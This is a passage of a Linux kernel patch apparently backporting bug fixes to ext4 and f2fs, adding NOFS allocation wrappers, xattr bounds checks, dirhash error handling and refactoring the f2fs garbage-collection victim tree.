+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1774,6 +1774,30 @@ static inline struct ext4_inode_info *EXT4_I(struct inode *inode)
+ 	return container_of(inode, struct ext4_inode_info, vfs_inode);
+ }
+ 
++static inline int ext4_writepages_down_read(struct super_block *sb)
++{
++	percpu_down_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	return memalloc_nofs_save();
++}
++
++static inline void ext4_writepages_up_read(struct super_block *sb, int ctx)
++{
++	memalloc_nofs_restore(ctx);
++	percpu_up_read(&EXT4_SB(sb)->s_writepages_rwsem);
++}
++
++static inline int ext4_writepages_down_write(struct super_block *sb)
++{
++	percpu_down_write(&EXT4_SB(sb)->s_writepages_rwsem);
++	return memalloc_nofs_save();
++}
++
++static inline void ext4_writepages_up_write(struct super_block *sb, int ctx)
++{
++	memalloc_nofs_restore(ctx);
++	percpu_up_write(&EXT4_SB(sb)->s_writepages_rwsem);
++}
++
+ static inline int ext4_valid_inum(struct super_block *sb, unsigned long ino)
+ {
+ 	return ino == EXT4_ROOT_INO ||
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 7bc221038c6c1..595abb9e7d74b 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -267,14 +267,12 @@ static void __es_find_extent_range(struct inode *inode,
+ 
+ 	/* see if the extent has been cached */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u) %llu %x\n",
+-				 lblk, es1->es_lblk, es1->es_len,
+-				 ext4_es_pblock(es1), ext4_es_status(es1));
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u) %llu %x\n",
++			 lblk, es1->es_lblk, es1->es_len,
++			 ext4_es_pblock(es1), ext4_es_status(es1));
++		goto out;
+ 	}
+ 
+ 	es1 = __es_tree_search(&tree->root, lblk);
+@@ -293,7 +291,7 @@ out:
+ 	}
+ 
+ 	if (es1 && matching_fn(es1)) {
+-		tree->cache_es = es1;
++		WRITE_ONCE(tree->cache_es, es1);
+ 		es->es_lblk = es1->es_lblk;
+ 		es->es_len = es1->es_len;
+ 		es->es_pblk = es1->es_pblk;
+@@ -931,14 +929,12 @@ int ext4_es_lookup_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	/* find extent in cache firstly */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u)\n",
+-				 lblk, es1->es_lblk, es1->es_len);
+-			found = 1;
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u)\n",
++			 lblk, es1->es_lblk, es1->es_len);
++		found = 1;
++		goto out;
+ 	}
+ 
+ 	node = tree->root.rb_node;
+diff --git a/fs/ext4/hash.c b/fs/ext4/hash.c
+index 147b5241dd94f..46c3423ddfa17 100644
+--- a/fs/ext4/hash.c
++++ b/fs/ext4/hash.c
+@@ -277,7 +277,11 @@ static int __ext4fs_dirhash(const struct inode *dir, const char *name, int len,
+ 	}
+ 	default:
+ 		hinfo->hash = 0;
+-		return -1;
++		hinfo->minor_hash = 0;
++		ext4_warning(dir->i_sb,
++			     "invalid/unsupported hash tree version %u",
++			     hinfo->hash_version);
++		return -EINVAL;
+ 	}
+ 	hash = hash & ~1;
+ 	if (hash == (EXT4_HTREE_EOF_32BIT << 1))
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 1602d74b5eeb3..cb36037f20fc8 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -34,6 +34,7 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_entry *entry;
+ 	struct ext4_inode *raw_inode;
++	void *end;
+ 	int free, min_offs;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+@@ -57,14 +58,23 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	raw_inode = ext4_raw_inode(iloc);
+ 	header = IHDR(inode, raw_inode);
+ 	entry = IFIRST(header);
++	end = (void *)raw_inode + EXT4_SB(inode->i_sb)->s_inode_size;
+ 
+ 	/* Compute min_offs. */
+-	for (; !IS_LAST_ENTRY(entry); entry = EXT4_XATTR_NEXT(entry)) {
++	while (!IS_LAST_ENTRY(entry)) {
++		void *next = EXT4_XATTR_NEXT(entry);
++
++		if (next >= end) {
++			EXT4_ERROR_INODE(inode,
++					 "corrupt xattr in inline inode");
++			return 0;
++		}
+ 		if (!entry->e_value_inum && entry->e_value_size) {
+ 			size_t offs = le16_to_cpu(entry->e_value_offs);
+ 			if (offs < min_offs)
+ 				min_offs = offs;
+ 		}
++		entry = next;
+ 	}
+ 	free = min_offs -
+ 		((void *)entry - (void *)IFIRST(header)) - sizeof(__u32);
+@@ -350,7 +360,7 @@ static int ext4_update_inline_data(handle_t *handle, struct inode *inode,
+ 
+ 	error = ext4_xattr_ibody_get(inode, i.name_index, i.name,
+ 				     value, len);
+-	if (error == -ENODATA)
++	if (error < 0)
+ 		goto out;
+ 
+ 	BUFFER_TRACE(is.iloc.bh, "get_write_access");
+@@ -1177,6 +1187,7 @@ static int ext4_finish_convert_inline_dir(handle_t *handle,
+ 		ext4_initialize_dirent_tail(dir_block,
+ 					    inode->i_sb->s_blocksize);
+ 	set_buffer_uptodate(dir_block);
++	unlock_buffer(dir_block);
+ 	err = ext4_handle_dirty_dirblock(handle, inode, dir_block);
+ 	if (err)
+ 		return err;
+@@ -1251,6 +1262,7 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 	if (!S_ISDIR(inode->i_mode)) {
+ 		memcpy(data_bh->b_data, buf, inline_size);
+ 		set_buffer_uptodate(data_bh);
++		unlock_buffer(data_bh);
+ 		error = ext4_handle_dirty_metadata(handle,
+ 						   inode, data_bh);
+ 	} else {
+@@ -1258,7 +1270,6 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 						       buf, inline_size);
+ 	}
+ 
+-	unlock_buffer(data_bh);
+ out_restore:
+ 	if (error)
+ 		ext4_restore_inline_data(handle, inode, iloc, buf, inline_size);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 0b87665aaff13..bfbfec99b1345 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -2957,13 +2957,14 @@ static int ext4_writepages(struct address_space *mapping,
+ 		.can_map = 1,
+ 	};
+ 	int ret;
++	int alloc_ctx;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(sb))))
+ 		return -EIO;
+ 
+-	percpu_down_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_read(sb);
+ 	ret = ext4_do_writepages(&mpd);
+-	percpu_up_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	ext4_writepages_up_read(sb, alloc_ctx);
+ 
+ 	return ret;
+ }
+@@ -2991,17 +2992,18 @@ static int ext4_dax_writepages(struct address_space *mapping,
+ 	long nr_to_write = wbc->nr_to_write;
+ 	struct inode *inode = mapping->host;
+ 	struct ext4_sb_info *sbi = EXT4_SB(mapping->host->i_sb);
++	int alloc_ctx;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
+ 		return -EIO;
+ 
+-	percpu_down_read(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_read(inode->i_sb);
+ 	trace_ext4_writepages(inode, wbc);
+ 
+ 	ret = dax_writeback_mapping_range(mapping, sbi->s_daxdev, wbc);
+ 	trace_ext4_writepages_result(inode, wbc, ret,
+ 				     nr_to_write - wbc->nr_to_write);
+-	percpu_up_read(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_read(inode->i_sb, alloc_ctx);
+ 	return ret;
+ }
+ 
+@@ -3575,7 +3577,7 @@ static int ext4_iomap_overwrite_begin(struct inode *inode, loff_t offset,
+ 	 */
+ 	flags &= ~IOMAP_WRITE;
+ 	ret = ext4_iomap_begin(inode, offset, length, flags, iomap, srcmap);
+-	WARN_ON_ONCE(iomap->type != IOMAP_MAPPED);
++	WARN_ON_ONCE(!ret && iomap->type != IOMAP_MAPPED);
+ 	return ret;
+ }
+ 
+@@ -6124,7 +6126,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 	journal_t *journal;
+ 	handle_t *handle;
+ 	int err;
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	int alloc_ctx;
+ 
+ 	/*
+ 	 * We have to be very careful here: changing a data block's
+@@ -6162,7 +6164,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 		}
+ 	}
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 	jbd2_journal_lock_updates(journal);
+ 
+ 	/*
+@@ -6179,7 +6181,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 		err = jbd2_journal_flush(journal, 0);
+ 		if (err < 0) {
+ 			jbd2_journal_unlock_updates(journal);
+-			percpu_up_write(&sbi->s_writepages_rwsem);
++			ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 			return err;
+ 		}
+ 		ext4_clear_inode_flag(inode, EXT4_INODE_JOURNAL_DATA);
+@@ -6187,7 +6189,7 @@ int ext4_change_inode_journal_flag(struct inode *inode, int val)
+ 	ext4_set_aops(inode);
+ 
+ 	jbd2_journal_unlock_updates(journal);
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 
+ 	if (val)
+ 		filemap_invalidate_unlock(inode->i_mapping);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 5b2ae37a8b80b..5639a4cf7ff98 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4820,7 +4820,11 @@ ext4_mb_release_group_pa(struct ext4_buddy *e4b,
+ 	trace_ext4_mb_release_group_pa(sb, pa);
+ 	BUG_ON(pa->pa_deleted == 0);
+ 	ext4_get_group_no_and_offset(sb, pa->pa_pstart, &group, &bit);
+-	BUG_ON(group != e4b->bd_group && pa->pa_len != 0);
++	if (unlikely(group != e4b->bd_group && pa->pa_len != 0)) {
++		ext4_warning(sb, "bad group: expected %u, group %u, pa_start %llu",
++			     e4b->bd_group, group, pa->pa_pstart);
++		return 0;
++	}
+ 	mb_free_blocks(pa->pa_inode, e4b, bit, pa->pa_len);
+ 	atomic_add(pa->pa_len, &EXT4_SB(sb)->s_mb_discarded);
+ 	trace_ext4_mballoc_discard(sb, NULL, group, bit, pa->pa_len);
+diff --git a/fs/ext4/migrate.c b/fs/ext4/migrate.c
+index a19a9661646eb..d98ac2af8199f 100644
+--- a/fs/ext4/migrate.c
++++ b/fs/ext4/migrate.c
+@@ -408,7 +408,6 @@ static int free_ext_block(handle_t *handle, struct inode *inode)
+ 
+ int ext4_ext_migrate(struct inode *inode)
+ {
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	handle_t *handle;
+ 	int retval = 0, i;
+ 	__le32 *i_data;
+@@ -418,6 +417,7 @@ int ext4_ext_migrate(struct inode *inode)
+ 	unsigned long max_entries;
+ 	__u32 goal, tmp_csum_seed;
+ 	uid_t owner[2];
++	int alloc_ctx;
+ 
+ 	/*
+ 	 * If the filesystem does not support extents, or the inode
+@@ -434,7 +434,7 @@ int ext4_ext_migrate(struct inode *inode)
+ 		 */
+ 		return retval;
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 
+ 	/*
+ 	 * Worst case we can touch the allocation bitmaps and a block
+@@ -586,7 +586,7 @@ out_tmp_inode:
+ 	unlock_new_inode(tmp_inode);
+ 	iput(tmp_inode);
+ out_unlock:
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 	return retval;
+ }
+ 
+@@ -605,6 +605,7 @@ int ext4_ind_migrate(struct inode *inode)
+ 	ext4_fsblk_t			blk;
+ 	handle_t			*handle;
+ 	int				ret, ret2 = 0;
++	int				alloc_ctx;
+ 
+ 	if (!ext4_has_feature_extents(inode->i_sb) ||
+ 	    (!ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+@@ -621,7 +622,7 @@ int ext4_ind_migrate(struct inode *inode)
+ 	if (test_opt(inode->i_sb, DELALLOC))
+ 		ext4_alloc_da_blocks(inode);
+ 
+-	percpu_down_write(&sbi->s_writepages_rwsem);
++	alloc_ctx = ext4_writepages_down_write(inode->i_sb);
+ 
+ 	handle = ext4_journal_start(inode, EXT4_HT_MIGRATE, 1);
+ 	if (IS_ERR(handle)) {
+@@ -665,6 +666,6 @@ errout:
+ 	ext4_journal_stop(handle);
+ 	up_write(&EXT4_I(inode)->i_data_sem);
+ out_unlock:
+-	percpu_up_write(&sbi->s_writepages_rwsem);
++	ext4_writepages_up_write(inode->i_sb, alloc_ctx);
+ 	return ret;
+ }
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 4681fff6665fe..46735ce315b5a 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -39,28 +39,36 @@ static void ext4_mmp_csum_set(struct super_block *sb, struct mmp_struct *mmp)
+  * Write the MMP block using REQ_SYNC to try to get the block on-disk
+  * faster.
+  */
+-static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++static int write_mmp_block_thawed(struct super_block *sb,
++				  struct buffer_head *bh)
+ {
+ 	struct mmp_struct *mmp = (struct mmp_struct *)(bh->b_data);
+ 
+-	/*
+-	 * We protect against freezing so that we don't create dirty buffers
+-	 * on frozen filesystem.
+-	 */
+-	sb_start_write(sb);
+ 	ext4_mmp_csum_set(sb, mmp);
+ 	lock_buffer(bh);
+ 	bh->b_end_io = end_buffer_write_sync;
+ 	get_bh(bh);
+ 	submit_bh(REQ_OP_WRITE | REQ_SYNC | REQ_META | REQ_PRIO, bh);
+ 	wait_on_buffer(bh);
+-	sb_end_write(sb);
+ 	if (unlikely(!buffer_uptodate(bh)))
+ 		return -EIO;
+-
+ 	return 0;
+ }
+ 
++static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++{
++	int err;
++
++	/*
++	 * We protect against freezing so that we don't create dirty buffers
++	 * on frozen filesystem.
++	 */
++	sb_start_write(sb);
++	err = write_mmp_block_thawed(sb, bh);
++	sb_end_write(sb);
++	return err;
++}
++
+ /*
+  * Read the MMP block. It _must_ be read from disk and hence we clear the
+  * uptodate flag on the buffer.
+@@ -340,7 +348,11 @@ skip:
+ 	seq = mmp_new_seq();
+ 	mmp->mmp_seq = cpu_to_le32(seq);
+ 
+-	retval = write_mmp_block(sb, bh);
++	/*
++	 * On mount / remount we are protected against fs freezing (by s_umount
++	 * semaphore) and grabbing freeze protection upsets lockdep
++	 */
++	retval = write_mmp_block_thawed(sb, bh);
+ 	if (retval)
+ 		goto failed;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 604ee458f31d7..6195e36576f10 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -674,7 +674,7 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 				len = de->name_len;
+ 				if (!IS_ENCRYPTED(dir)) {
+ 					/* Directory is not encrypted */
+-					ext4fs_dirhash(dir, de->name,
++					(void) ext4fs_dirhash(dir, de->name,
+ 						de->name_len, &h);
+ 					printk("%*.s:(U)%x.%u ", len,
+ 					       name, h.hash,
+@@ -709,8 +709,9 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 					if (IS_CASEFOLDED(dir))
+ 						h.hash = EXT4_DIRENT_HASH(de);
+ 					else
+-						ext4fs_dirhash(dir, de->name,
+-						       de->name_len, &h);
++						(void) ext4fs_dirhash(dir,
++							de->name,
++							de->name_len, &h);
+ 					printk("%*.s:(E)%x.%u ", len, name,
+ 					       h.hash, (unsigned) ((char *) de
+ 								   - base));
+@@ -720,7 +721,8 @@ static struct stats dx_show_leaf(struct inode *dir,
+ #else
+ 				int len = de->name_len;
+ 				char *name = de->name;
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++				(void) ext4fs_dirhash(dir, de->name,
++						      de->name_len, &h);
+ 				printk("%*.s:%x.%u ", len, name, h.hash,
+ 				       (unsigned) ((char *) de - base));
+ #endif
+@@ -849,8 +851,14 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
+ 	hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 	/* hash is already computed for encrypted casefolded directory */
+ 	if (fname && fname_name(fname) &&
+-				!(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir)))
+-		ext4fs_dirhash(dir, fname_name(fname), fname_len(fname), hinfo);
++	    !(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir))) {
++		int ret = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), hinfo);
++		if (ret < 0) {
++			ret_err = ERR_PTR(ret);
++			goto fail;
++		}
++	}
+ 	hash = hinfo->hash;
+ 
+ 	if (root->info.unused_flags & 1) {
+@@ -1111,7 +1119,12 @@ static int htree_dirblock_to_tree(struct file *dir_file,
+ 				hinfo->minor_hash = 0;
+ 			}
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name,
++					     de->name_len, hinfo);
++			if (err < 0) {
++				count = err;
++				goto errout;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+@@ -1313,8 +1326,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 		if (de->name_len && de->inode) {
+ 			if (ext4_hash_in_dirent(dir))
+ 				h.hash = EXT4_DIRENT_HASH(de);
+-			else
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++			else {
++				int err = ext4fs_dirhash(dir, de->name,
++						     de->name_len, &h);
++				if (err < 0)
++					return err;
++			}
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+@@ -1452,10 +1469,9 @@ int ext4_fname_setup_ci_filename(struct inode *dir, const struct qstr *iname,
+ 	hinfo->hash_version = DX_HASH_SIPHASH;
+ 	hinfo->seed = NULL;
+ 	if (cf_name->name)
+-		ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
++		return ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
+ 	else
+-		ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+-	return 0;
++		return ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+ }
+ #endif
+ 
+@@ -2298,10 +2314,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 	fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 
+ 	/* casefolded encrypted hashes are computed on fname setup */
+-	if (!ext4_hash_in_dirent(dir))
+-		ext4fs_dirhash(dir, fname_name(fname),
+-				fname_len(fname), &fname->hinfo);
+-
++	if (!ext4_hash_in_dirent(dir)) {
++		int err = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), &fname->hinfo);
++		if (err < 0) {
++			brelse(bh2);
++			brelse(bh);
++			return err;
++		}
++	}
+ 	memset(frames, 0, sizeof(frames));
+ 	frame = frames;
+ 	frame->entries = entries;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index e79ca9ef98316..2565fb02b7ab5 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -3195,11 +3195,9 @@ static __le16 ext4_group_desc_csum(struct super_block *sb, __u32 block_group,
+ 	crc = crc16(crc, (__u8 *)gdp, offset);
+ 	offset += sizeof(gdp->bg_checksum); /* skip checksum */
+ 	/* for checksum of struct ext4_group_desc do the rest...*/
+-	if (ext4_has_feature_64bit(sb) &&
+-	    offset < le16_to_cpu(sbi->s_es->s_desc_size))
++	if (ext4_has_feature_64bit(sb) && offset < sbi->s_desc_size)
+ 		crc = crc16(crc, (__u8 *)gdp + offset,
+-			    le16_to_cpu(sbi->s_es->s_desc_size) -
+-				offset);
++			    sbi->s_desc_size - offset);
+ 
+ out:
+ 	return cpu_to_le16(crc);
+@@ -6568,9 +6566,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	}
+ 
+ #ifdef CONFIG_QUOTA
+-	/* Release old quota file names */
+-	for (i = 0; i < EXT4_MAXQUOTAS; i++)
+-		kfree(old_opts.s_qf_names[i]);
+ 	if (enable_quota) {
+ 		if (sb_any_quota_suspended(sb))
+ 			dquot_resume(sb, -1);
+@@ -6580,6 +6575,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 				goto restore_opts;
+ 		}
+ 	}
++	/* Release old quota file names */
++	for (i = 0; i < EXT4_MAXQUOTAS; i++)
++		kfree(old_opts.s_qf_names[i]);
+ #endif
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+@@ -6590,6 +6588,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	return 0;
+ 
+ restore_opts:
++	/*
++	 * If there was a failing r/w to ro transition, we may need to
++	 * re-enable quota
++	 */
++	if ((sb->s_flags & SB_RDONLY) && !(old_sb_flags & SB_RDONLY) &&
++	    sb_any_quota_suspended(sb))
++		dquot_resume(sb, -1);
+ 	sb->s_flags = old_sb_flags;
+ 	sbi->s_mount_opt = old_opts.s_mount_opt;
+ 	sbi->s_mount_opt2 = old_opts.s_mount_opt2;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index f66c3fae90584..30f7c79ced471 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2581,6 +2581,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 		.in_inode = !!entry->e_value_inum,
+ 	};
+ 	struct ext4_xattr_ibody_header *header = IHDR(inode, raw_inode);
++	int needs_kvfree = 0;
+ 	int error;
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+@@ -2603,7 +2604,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 			error = -ENOMEM;
+ 			goto out;
+ 		}
+-
++		needs_kvfree = 1;
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+@@ -2642,7 +2643,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ out:
+ 	kfree(b_entry_name);
+-	if (entry->e_value_inum && buffer)
++	if (needs_kvfree && buffer)
+ 		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 342af24b2f8cf..3949ce2b484d9 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -179,29 +179,6 @@ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 	return re;
+ }
+ 
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-					struct rb_root_cached *root,
+-					struct rb_node **parent,
+-					unsigned long long key, bool *leftmost)
+-{
+-	struct rb_node **p = &root->rb_root.rb_node;
+-	struct rb_entry *re;
+-
+-	while (*p) {
+-		*parent = *p;
+-		re = rb_entry(*parent, struct rb_entry, rb_node);
+-
+-		if (key < re->key) {
+-			p = &(*p)->rb_left;
+-		} else {
+-			p = &(*p)->rb_right;
+-			*leftmost = false;
+-		}
+-	}
+-
+-	return p;
+-}
+-
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -310,7 +287,7 @@ lookup_neighbors:
+ }
+ 
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key)
++				struct rb_root_cached *root)
+ {
+ #ifdef CONFIG_F2FS_CHECK_FS
+ 	struct rb_node *cur = rb_first_cached(root), *next;
+@@ -327,23 +304,12 @@ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+ 		cur_re = rb_entry(cur, struct rb_entry, rb_node);
+ 		next_re = rb_entry(next, struct rb_entry, rb_node);
+ 
+-		if (check_key) {
+-			if (cur_re->key > next_re->key) {
+-				f2fs_info(sbi, "inconsistent rbtree, "
+-					"cur(%llu) next(%llu)",
+-					cur_re->key, next_re->key);
+-				return false;
+-			}
+-			goto next;
+-		}
+-
+ 		if (cur_re->ofs + cur_re->len > next_re->ofs) {
+ 			f2fs_info(sbi, "inconsistent rbtree, cur(%u, %u) next(%u, %u)",
+ 				  cur_re->ofs, cur_re->len,
+ 				  next_re->ofs, next_re->len);
+ 			return false;
+ 		}
+-next:
+ 		cur = next;
+ 	}
+ #endif
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 42962ee0a1179..8f01d2344409a 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -629,13 +629,8 @@ enum extent_type {
+ 
+ struct rb_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned int ofs;	/* start offset of the entry */
+-			unsigned int len;	/* length of the entry */
+-		};
+-		unsigned long long key;		/* 64-bits key */
+-	} __packed;
++	unsigned int ofs;		/* start offset of the entry */
++	unsigned int len;		/* length of the entry */
+ };
+ 
+ struct extent_info {
+@@ -4164,10 +4159,6 @@ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi);
+  */
+ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 				struct rb_entry *cached_re, unsigned int ofs);
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root,
+-				struct rb_node **parent,
+-				unsigned long long key, bool *left_most);
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -4178,7 +4169,7 @@ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+ 		struct rb_node ***insert_p, struct rb_node **insert_parent,
+ 		bool force, bool *leftmost);
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key);
++				struct rb_root_cached *root);
+ void f2fs_init_extent_tree(struct inode *inode);
+ void f2fs_drop_extent_tree(struct inode *inode);
+ void f2fs_destroy_extent_node(struct inode *inode);
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 72cda2f9380f2..97426be7e07de 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -392,40 +392,95 @@ static unsigned int count_bits(const unsigned long *addr,
+ 	return sum;
+ }
+ 
+-static struct victim_entry *attach_victim_entry(struct f2fs_sb_info *sbi,
+-				unsigned long long mtime, unsigned int segno,
+-				struct rb_node *parent, struct rb_node **p,
+-				bool left_most)
++static bool f2fs_check_victim_tree(struct f2fs_sb_info *sbi,
++				struct rb_root_cached *root)
++{
++#ifdef CONFIG_F2FS_CHECK_FS
++	struct rb_node *cur = rb_first_cached(root), *next;
++	struct victim_entry *cur_ve, *next_ve;
++
++	while (cur) {
++		next = rb_next(cur);
++		if (!next)
++			return true;
++
++		cur_ve = rb_entry(cur, struct victim_entry, rb_node);
++		next_ve = rb_entry(next, struct victim_entry, rb_node);
++
++		if (cur_ve->mtime > next_ve->mtime) {
++			f2fs_info(sbi, "broken victim_rbtree, "
++				"cur_mtime(%llu) next_mtime(%llu)",
++				cur_ve->mtime, next_ve->mtime);
++			return false;
++		}
++		cur = next;
++	}
++#endif
++	return true;
++}
++
++static struct victim_entry *__lookup_victim_entry(struct f2fs_sb_info *sbi,
++					unsigned long long mtime)
++{
++	struct atgc_management *am = &sbi->am;
++	struct rb_node *node = am->root.rb_root.rb_node;
++	struct victim_entry *ve = NULL;
++
++	while (node) {
++		ve = rb_entry(node, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime)
++			node = node->rb_left;
++		else
++			node = node->rb_right;
++	}
++	return ve;
++}
++
++static struct victim_entry *__create_victim_entry(struct f2fs_sb_info *sbi,
++		unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+ 	struct victim_entry *ve;
+ 
+-	ve =  f2fs_kmem_cache_alloc(victim_entry_slab,
+-				GFP_NOFS, true, NULL);
++	ve =  f2fs_kmem_cache_alloc(victim_entry_slab, GFP_NOFS, true, NULL);
+ 
+ 	ve->mtime = mtime;
+ 	ve->segno = segno;
+ 
+-	rb_link_node(&ve->rb_node, parent, p);
+-	rb_insert_color_cached(&ve->rb_node, &am->root, left_most);
+-
+ 	list_add_tail(&ve->list, &am->victim_list);
+-
+ 	am->victim_count++;
+ 
+ 	return ve;
+ }
+ 
+-static void insert_victim_entry(struct f2fs_sb_info *sbi,
++static void __insert_victim_entry(struct f2fs_sb_info *sbi,
